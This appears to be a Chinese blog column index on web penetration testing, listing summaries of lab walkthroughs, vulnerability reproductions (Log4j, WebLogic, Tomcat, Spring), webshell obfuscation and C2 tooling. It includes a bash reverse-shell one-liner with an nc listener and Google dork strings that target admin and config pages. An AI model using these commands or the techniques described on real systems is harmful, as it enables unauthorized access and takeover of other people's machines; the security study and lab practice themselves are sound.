web渗透
文章平均质量分 75
一口一只瑜
萌新入坑优快云
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
HexStrike使用搭建
本文介绍了HexStrike-AI项目的部署和使用方法。项目地址为https://github.com/0x4m4/hexstrike-ai。部署步骤包括:1)克隆项目;2)创建Python虚拟环境;3)安装依赖项;4)启动服务(支持调试模式和自定义端口)。使用方法演示了与DeepSeek AI的集成过程,包括密钥创建、Cherry Studio安装和hexstrike_mcp.py配置文件设置。最后提醒需先安装requests和mcp等必要依赖库,安装时可使用清华镜像源加速。完成配置后即可调用AI服务。原创 2025-11-02 14:30:57 · 631 阅读 · 0 评论 -
云安全-OSS存储桶遍历
OSS存储桶遍历原创 2025-10-27 15:26:19 · 482 阅读 · 0 评论 -
Google资料搜索语法
site:xxx.com (inurl:login OR inurl:admin OR inurl:index OR inurl:登录) OR (inurl:config | inurl:env | inurl:setting | inurl:backup | inurl:admin | inurl:php)site:xxx.com intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|手册|admin|login|sys|managetem|password|username。原创 2025-10-21 09:36:27 · 387 阅读 · 0 评论 -
云安全-ssrf
云平台元数据服务通过内网地址提供实例配置信息,主要厂商地址包括AWS、阿里云、腾讯云等。SSRF漏洞可能被利用访问这些服务,获取敏感数据如实例ID、网络配置、安全凭证等。以京东云为例,可通过特定URL路径查询基本信息、网络配置、用户数据及自定义元数据,存在数据泄露风险。企业应加强SSRF防护,避免元数据服务被恶意利用。原创 2025-09-29 11:12:25 · 247 阅读 · 0 评论 -
SSI注入
本文介绍了SSI(Server Side Includes)服务器端包含技术及其安全风险。当网站限制上传PHP等文件时,攻击者可利用SSI注入执行命令。SSI通过嵌入HTML的指令在服务器端动态生成内容,支持.shtml等文件执行系统命令。文章详细讲解了Nginx和Apache开启SSI的方法,并以[BJDCTF2020]EasySearch为例,展示了如何通过上传含SSI指令的.shtml文件获取服务器权限,最终读取flag文件。该漏洞利用需要服务器同时开启SSI和CGI支持。原创 2025-09-28 14:19:10 · 583 阅读 · 0 评论 -
Spring Framework RCE
摘要:本文介绍了Spring框架的核心模块及其漏洞原理,重点分析了Spring-beans包中基于参数绑定和Accesslog功能的漏洞。通过构造恶意请求修改Tomcat日志属性,利用pipeline机制实现任意文件写入。文章提供了详细的漏洞复现步骤,包括payload构造和命令执行方法,并附有相关技术分析链接。该漏洞允许攻击者在目标服务器上执行任意命令,具有较高危险性。原创 2025-09-27 14:45:35 · 163 阅读 · 0 评论 -
whu登录口逆向
摘要:文章分析了某网站登录过程的AES加密机制。通过调试发现密码加密使用CBC模式、Pkcs7填充的AES算法,其中key为64位随机字符串,iv为16位随机字符串,均从特定字符集生成。加密时会结合前端默认盐值"yEocqvK0Tt53OiXh",最终输出Base64格式的密文。调试过程展示了如何追踪加密参数来源及验证加密逻辑的正确性。原创 2025-09-05 11:16:35 · 1089 阅读 · 0 评论 -
微信hook+反编译
本文介绍了一套微信小程序开发工具包,包含四个关键组件:hook工具、两个反编译工具和微信历史版本安装包。操作步骤简明:下载解压后,运行提供的bat脚本即可自动完成微信开发工具注入和小程序扫描。bat脚本会启动两个并行进程:WechatOpenDevTools-Python注入工具和wxapkg扫描工具。文末还推荐了一个集成化工具e0e1-wx的GitHub链接,可实现一键hook反编译功能。这套工具适用于开发者进行微信小程序逆向分析和调试工作。原创 2025-09-03 16:00:12 · 171 阅读 · 0 评论 -
frp基础知识
FRP内网穿透技术通过"反向连接+隧道转发"机制解决内网设备无公网IP的访问问题。其核心架构包括部署在公网的FRP服务端和在内网的客户端,通过客户端主动建立TCP长连接形成隧道。支持TCP/UDP/HTTP/HTTPS多种协议,提供TLS加密、Token验证等安全机制。关键技术在于利用心跳维持NAT映射,实现多路复用和流量转发。相比Ngrok和VPN,FRP配置复杂度中等但协议支持全面,成为渗透测试等领域的重要工具。通过巧妙的主动连接设计,有效规避了NAT对入站连接的阻拦问题。原创 2025-08-25 11:24:50 · 866 阅读 · 0 评论 -
MSF基础知识
本文详细介绍了Metasploit框架的核心目录结构和功能模块。重点解析了modules/目录下的六大关键模块:漏洞利用(exploits)、有效载荷(payloads)、辅助工具(auxiliary)、后渗透(post)、编码器(encoders)和空指令(nops)。同时说明了lib、tools、scripts等目录的用途,并列举了msfconsole、msfvenom等核心可执行命令的功能。原创 2025-08-24 22:06:22 · 1085 阅读 · 0 评论 -
红日靶场5
文章摘要 本文记录了针对Windows 7和Windows Server 2008虚拟机的渗透测试过程。测试者首先通过ThinkPHP框架的RCE漏洞获取初始权限,使用哥斯拉和蚁剑上传Webshell后,通过MSF生成木马实现权限提升至system。随后关闭目标防火墙,进行内网渗透,添加路由并建立SOCKS代理。在探测内网主机时遇到问题,最终通过上传fscan工具成功发现另一台主机(192.168.138.138)的开放端口,并利用MS17-010漏洞尝试横向移动。原创 2025-08-21 23:58:59 · 458 阅读 · 0 评论 -
内网安全——出网协议端口探测
文章摘要:本文介绍了在实战中探测目标主机是否出网的方法,包括端口和协议的探测。对于Linux系统,提供了使用bash命令、nmap、masscan等工具探测出网端口的详细方法;Windows系统则推荐使用图形化工具或命令行工具。在协议探测方面,分别介绍了ICMP、DNS和HTTP协议的探测技巧,如使用ping、nslookup、curl等命令。这些方法可帮助安全人员快速判断目标主机的网络连通性,为后续渗透测试提供基础信息。原创 2025-08-20 20:42:11 · 330 阅读 · 0 评论 -
红日靶场03
靶场渗透测试报告摘要 本测试针对一个黑盒靶场环境进行渗透,目标系统包括CentOS、Ubuntu和多个Windows服务器。通过Kali Linux双网卡配置(桥接/NAT)发起攻击。初始信息收集发现CentOS主机开放SSH、HTTP和MySQL服务。利用Joomla!配置文件泄露获取数据库凭证(testuser/cvcvgjASD!@),通过SQL注入创建管理员账户(admin2/secret)成功登录后台。上传Webshell后,发现系统函数受限,最终使用蚁剑工具绕过限制获得系统权限。原创 2025-08-19 16:17:14 · 1135 阅读 · 0 评论 -
红日靶场01<超水版>
本文记录了通过Kali攻击机对Windows 7跳板机进行渗透测试的过程。测试发现目标系统存在MySQL弱密码漏洞(root/root),利用该漏洞通过日志写入成功获取Webshell。随后在跳板机上开启3389远程桌面端口,创建管理员账户并关闭防火墙防护,最终实现远程桌面登录控制。整个过程演示了从弱口令利用到权限提升的完整渗透路径,突出了数据库安全配置与系统防护的重要性。原创 2025-08-18 17:42:30 · 1047 阅读 · 0 评论 -
红日靶场02<环境出问题版...>
本文记录了针对内网环境的渗透测试过程,主要涉及三台主机:DC(10.10.10.10)、WEB(10.10.10.129/192.168.111.80)和PC(10.10.10.201/192.168.111.201)。通过nmap扫描发现WEB主机的445端口存在MS17-010漏洞,成功利用Metasploit获取权限并收集系统信息。测试中发现PC主机的10.10.10.201地址无法被其他主机ping通,网络互通性存在问题。原创 2025-08-18 17:35:54 · 421 阅读 · 0 评论 -
MSF&CobaltStrike联动
摘要: 本文介绍了Cobalt Strike(CS)与Metasploit(MSF)之间的会话联动方法,实现流量转发与控制。CS转MSF:首先在CS创建外部监听器,MSF配置对应监听(reverse_http),通过CS的spawn指令将会话转发至MSF。MSF转CS:MSF后台会话后,利用payload_inject模块注入会话至CS监听器(需提前配置),实现会话迁移。两种方式均需确保IP与端口匹配,有效提升攻防演练中对目标主机的操作灵活性。关键步骤配图辅助说明,便于理解与复现。原创 2025-08-15 16:46:17 · 235 阅读 · 0 评论 -
cobaltstrike基础使用——C2创建监听及Attack
Cobalt Strike监听器与Beacon通信机制 Cobalt Strike的监听器分为内置Beacon和外置Foreign两种。Beacon作为植入目标主机的Payload,支持异步和交互式两种通信模式: 异步通信:Beacon按预设时间间隔与Teamserver通信 交互通信(Sleep 0):实现实时命令交互 通过Attack模块可生成多种Payload类型,包括HTA应用、Office宏等。原创 2025-08-15 11:16:49 · 410 阅读 · 0 评论 -
MSF基础使用——靶机利用
摘要:本文记录了通过Kali攻击机(192.168.11.135)利用MS17-010漏洞攻击Windows Server 2012(192.168.11.139)的过程。使用Metasploit框架中的ms17_010_psexec模块设置相关参数后成功获取shell。在抓取密码环节发现传统hashdump命令已被弃用,需使用run post/windows/gather/smart_hashdump命令替代。该过程展示了MS17-010漏洞的利用方法和Metasploit工具的最新使用方法变更。原创 2025-08-14 15:21:27 · 511 阅读 · 0 评论 -
MSF使用基础——MS17_010永恒之蓝
摘要:本文演示了利用Metasploit框架对Windows系统进行MS17-010漏洞攻击的过程。攻击者通过设置攻击机(192.168.11.135)和受害机(192.168.11.136)的IP地址,使用psexec模块结合已知凭据(administrator/asd)成功建立meterpreter会话。文中详细介绍了漏洞检测方法、攻击参数配置及匿名访问设置技巧,包括注册表修改和组策略调整。攻击成功后可通过shell命令进入交互界面,并建议使用chcp 65001解决编码问题。原创 2025-08-14 11:53:51 · 382 阅读 · 0 评论 -
burpsuite靶场-SSRF
本文记录了BurpSuite靶场中SSRF漏洞的四个实验过程。01实验通过修改stockApi参数访问admin界面删除用户;02实验指定192.168.0.x:8080来源后删除用户;03实验利用Referer标头和Burp Collaborator完成攻击;04实验通过IPv4缩写和admin编码绕过防护。每个实验都成功完成目标操作,最后返回首页验证结果。这些实验展示了SSRF漏洞的不同利用方式和防护绕过技巧。原创 2025-08-12 12:21:20 · 322 阅读 · 0 评论 -
docker安装arl灯塔信息搜集工具
本文详细介绍了在Ubuntu/Linux系统上配置Docker环境的步骤。原创 2025-05-15 07:36:43 · 508 阅读 · 0 评论 -
web渗透——信息收集(4)
forks:1000…created:>2019-02-12 test #创建时间大于 2019-02-12 的搜索关键字。user:test in:name test #组合搜索,用户名 test 的标题含有 test 的。pushed:>2019-02-12 test #发布时间大于 2019-02-12 的搜索关键字。用户访问域名 -> CDN节点(WAF) -> 真实服务器ip -> 访问目标主机。forks:>1000 test #forks 数量大于 1000 的搜索关键字。原创 2025-05-14 08:29:40 · 650 阅读 · 0 评论 -
web渗透——信息收集(3)
web渗透信息收集之app相关和源码获取原创 2025-05-13 13:04:33 · 709 阅读 · 0 评论 -
web渗透——信息收集(2)
小程序开发涉及多个关键文件和目录结构。主体部分由 app.js、app.json 和 app.wxss 组成,分别负责小程序逻辑、公共配置和样式表。原创 2025-05-13 13:01:48 · 301 阅读 · 0 评论 -
web安全——权限提升
权限提升是网络安全中的一个重要概念,通常指利用系统或应用程序的漏洞,将当前用户的权限提升至更高等级,如管理员或root权限。在Windows和Linux系统中,提权通常通过执行特定的可执行文件(如MS08067.exe或2.6.18.c)来实现。Linux系统中,提权方法包括SUID提权、内核漏洞提权和脏牛提权(CVE-2016-5195)等。SUID提权利用具有SUID属性的文件,以文件所有者的权限执行命令;内核漏洞提权则通过利用操作系统的内核漏洞来获取更高权限;脏牛提权是一种针对Linux内核的漏洞利用原创 2025-05-12 12:28:51 · 1922 阅读 · 0 评论 -
小程序代理抓包+反编译+动态调试
Proxifier是一款功能强大的网络代理工具,它可以让你将网络应用程序通过代理服务器进行连接。它提供了一个简单而灵活的方式,让你能够将任何应用程序的网络流量路由到指定的代理服务器上,从而实现匿名浏览、绕过网络封锁、访问受限网站等功能。Proxifier 的工作原理是通过修改操作系统的网络设置,将应用程序的网络连接引导到代理服务器上。它支持多种代理协议,包括HTTP、HTTPS、SOCKS v4和SOCKS v5,可以与各种代理服务器兼容。原创 2025-05-10 12:33:52 · 1195 阅读 · 0 评论 -
一句话后门总结
文章摘要:本文介绍了多种编程语言(PHP、ASP、ASPX、JSP)中恶意代码的变种和混淆技术,旨在绕过安全检测。PHP部分通过变量名变形、函数名混淆、Base64编码、回调函数等手段隐藏恶意代码;ASP和ASPX则利用不同的执行方法、字符串拼接、服务器组件等技术实现代码混淆;JSP部分则通过反射、ScriptEngineManager、Base64编码等方式动态执行命令。这些技术展示了攻击者如何通过变形和混淆手段规避安全机制,强调了代码审计和安全防护的重要性。原创 2025-05-10 10:08:14 · 852 阅读 · 0 评论 -
upload靶场通关笔记
本文介绍了如何搭建和使用upload-labs靶场,并通过几个示例展示了常见的文件上传漏洞及其绕过方法。首先,使用Docker快速搭建upload-labs环境,接着详细解析了move_uploaded_file、unlink、in_array等PHP函数的作用。文章通过多个关卡示例(如前端验证、MIME验证、黑名单绕过、.htaccess和.user.ini利用、大小写绕过等),展示了如何利用不同技术手段绕过文件上传限制,最终成功上传恶意文件并执行。这些示例帮助读者理解文件上传漏洞的常见攻击手法及防御措施原创 2025-05-10 10:03:23 · 620 阅读 · 0 评论 -
远程shell反弹
本文介绍了在Kali Linux和CentOS之间进行Shell反弹的实验步骤。首先,确保两台设备的IP地址分别为192.168.217.129(Kali)和192.168.217.140(CentOS),并且能够相互通信。实验中关闭了CentOS的防火墙。在Kali上使用nc -lvvp 4444命令监听4444端口,随后在CentOS上执行bash -i >& /dev/tcp/192.168.217.129/4444 0>&1命令,将Shell反弹到Kali。文章详细解释了命令的含义,包括nc的监听模原创 2025-05-10 09:48:00 · 692 阅读 · 0 评论 -
sqlmap的使用
sqlmap 是一款用于检测和利用 SQL 注入漏洞的强大工具。其基础命令包括设置目标 URL、定义请求参数、调整检测级别和风险级别等。用户可以通过指定参数、使用代理或 Tor 网络来增强测试的隐蔽性。进阶命令则提供了更多定制化选项,如从文件中加载目标、设置 HTTP 头部、优化性能等。sqlmap 还支持多种 SQL 注入技术,并能够枚举数据库信息、访问操作系统,甚至获取交互式 shell。通过灵活的配置和丰富的功能,sqlmap 成为渗透测试中不可或缺的工具。原创 2025-05-10 09:41:06 · 1216 阅读 · 0 评论 -
sqli-labs靶场通关笔记
sqli-labs是一个用于学习和实践SQL注入技术的靶场环境。通过Docker可以快速搭建该环境,具体步骤包括搜索、拉取、运行镜像,并创建容器。在靶场中,用户可以通过不同的关卡(如Less-1、Less-2、Less-3)练习SQL注入技巧。每个关卡涉及不同的注入类型,如基于错误的GET单引号字符型注入、整型注入等。通过判断闭合方式、列数、显位等步骤,用户可以逐步获取数据库信息,如库名、表名、列名和字段内容。这些练习有助于深入理解SQL注入的原理和防御方法。原创 2025-05-10 08:36:55 · 1038 阅读 · 0 评论 -
Jboss漏洞复现
序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObject()方法用于反序列化。问题的根源在于类ObjectInputStream在反序列化时,没有对生成的对象的类型做限制。原创 2025-05-10 07:45:59 · 696 阅读 · 0 评论 -
log4j漏洞复现
Log4j是一个广泛使用的Java日志框架,具有高度灵活性、高效性和可扩展性,适用于调试和监控应用程序。然而,Log4j也暴露了多个安全漏洞,如CVE-2017-5645和CVE-2021-44228。CVE-2017-5645是一个反序列化漏洞,攻击者通过发送恶意payload触发代码执行,影响Log4j 2.8.2之前的2.x版本。CVE-2021-44228是一个远程代码执行(RCE)漏洞,攻击者利用JNDI协议加载远程恶意脚本,影响Log4j 2.0到2.15.0-rc2版本。漏洞复现表明,攻击者可原创 2025-05-10 07:41:48 · 945 阅读 · 0 评论 -
Weblogic中间件漏洞复现
WebLogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。两个页面分别为/ws_utc/begin.do,/ws_utc/config.do未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的WebLogicServer 上执行任意代码。原创 2025-05-09 18:16:31 · 841 阅读 · 0 评论 -
tomcat中间件漏洞复现
而该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者可通过构造特定参数读取webapp目录下的任意文件,如:webapp 配置文件或源代码等。先进行端口扫描发现这几个端口是开放的,8009端口的AJP协议是开启的,Tomcat版本<9.0.31,并且存在8009端口ajp服务的开启。这些权限的究竟有什么作用,详情阅读 Apache Tomcat 8 (8.5.77) - Manager App How-To。manager-script 拥有text接口的权限,和status权限。原创 2025-05-09 18:07:09 · 1052 阅读 · 0 评论 -
部分中间件漏洞
漏洞方向(1)以*.asp为命名的文件夹下的任何文章会被解析为.asp格式(2)*.asp;.jpg这种格式的文件,后缀会被;所截断,分号后的被忽略,文件被当做asp执行防御方向:(1)在服务器上限制上传目录的执行权限不让他执行脚本(2)也不允许新建目录防止出现上文说的文件夹名称解析漏洞(3)将上传的文件重命名,什么随机数,时间戳都用上。原创 2025-05-09 17:50:08 · 715 阅读 · 0 评论 -
漏洞流量特征分析
(1)对sqlmap的判断:若攻击者使用sqlmap且未加 --random-agent参数,则可以通过捕获请求包的user-agent字段来判断攻击者是否在使用sqlmap进行攻击(因为sqlmap使用会将许多payload进行测试,但是UA头不变);sqlmap在进行初识监测时会进行一些预检测,第一条语句是对数据库类型和XSS漏洞进行监测,且这句话几乎每次注入都不变,即我们可以通过XSS测试语句判断。(2)出现一些特殊字符:比如单引号括号’((3)出现SQL命令或语句:增加、删除、修改、查询。转载 2025-05-09 17:46:26 · 560 阅读 · 0 评论 -
rad -> burpsuite -> x-ray 联动
本文介绍了使用多种工具进行网络安全测试的流程。首先,通过rad工具爬取目标网站数据,并将数据通过Burp Suite进行代理处理。接着,使用x-ray工具对Burp Suite的数据进行扫描,生成HTML格式的测试报告。此外,还介绍了nuclei工具的安装与使用,包括从GitHub下载、解压、安装到本地,并通过命令行进行漏洞扫描。最后,nuclei的扫描结果可以上传至云端进行进一步分析。整个过程涵盖了从数据爬取、代理处理、漏洞扫描到结果上传的完整测试流程。原创 2025-05-09 17:33:40 · 188 阅读 · 0 评论 -
kali安装后的基础配置与flask的启动
kail的安装配置原创 2025-05-09 17:26:02 · 224 阅读 · 0 评论
分享